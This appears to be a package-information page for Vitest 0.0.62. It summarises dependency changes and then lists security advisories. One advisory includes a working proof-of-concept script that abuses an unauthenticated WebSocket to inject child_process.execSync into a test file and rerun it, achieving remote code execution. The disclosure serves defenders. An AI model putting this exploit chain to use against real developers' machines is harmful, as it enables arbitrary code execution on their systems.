Vitest version 0.0.62 represents a minor update over version 0.0.61, released shortly thereafter, primarily affecting the dependency list. One notable change is the removal of jest-util, @jest/test-result, and jest-snapshot as direct dependencies. This suggests a shift away from relying on Jest-related utilities, potentially indicating improvements or alternative implementations for similar functionalities within Vitest itself. Conversely, pretty-format has been added as a dependency, possibly to enhance output formatting during testing.
Both versions share a common core set of dependencies critical for Vitest's functionality, including c8 for coverage, chai for assertions, jsdom for browser-like testing environments, and sinon for spies and stubs. Development dependencies like esno, tsup, and vite remain consistent, reflecting the continued use of these tools for building and developing Vitest. The peer dependency on vite also remains unchanged.
Developers considering Vitest will find a fast and Vite-powered unit testing framework. The move from jest utilities helps to reduce used dependencies. These dependencies highlight the framework's focus on speed, modern JavaScript features, and compatibility with the Vite ecosystem. With tools for coverage, assertions, and mocking, Vitest provides a comprehensive toolset for testing JavaScript and TypeScript code. This very recent update signifies continuous development and optimization of the framework.
All the vulnerabilities related to the version 0.0.62 of the package
Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening
Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.
When api
option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46
This WebSocket server has saveTestFile
API that can edit a test file and rerun
API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile
API and then running that file by calling the rerun
API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76
calc
executable in PATH
env var (you'll likely have it if you are running on Windows), that application will be executed.// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});
// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
console.log(e.data)
})
ws.addEventListener('open', () => {
ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))
const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"
// edit file content to inject command execution
ws.send(Flatted.stringify({
t: 'q',
i: crypto.randomUUID(),
m: "saveTestFile",
a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
}))
// rerun the tests to run the injected command execution code
ws.send(Flatted.stringify({
t: 'q',
i: crypto.randomUUID(),
m: "rerun",
a: [testFilePath]
}))
})
This vulnerability can result in remote code execution for users that are using Vitest serve API.
happy-dom allows for server side code to be executed by a <script> tag
Consumers of the NPM package happy-dom
The security vulnerability has been patched in v15.10.2
No easy workarounds to my knowledge
antfu/utils vulnerable to prototype pollution
Prototype Pollution in GitHub repository antfu/utils prior to 0.7.3.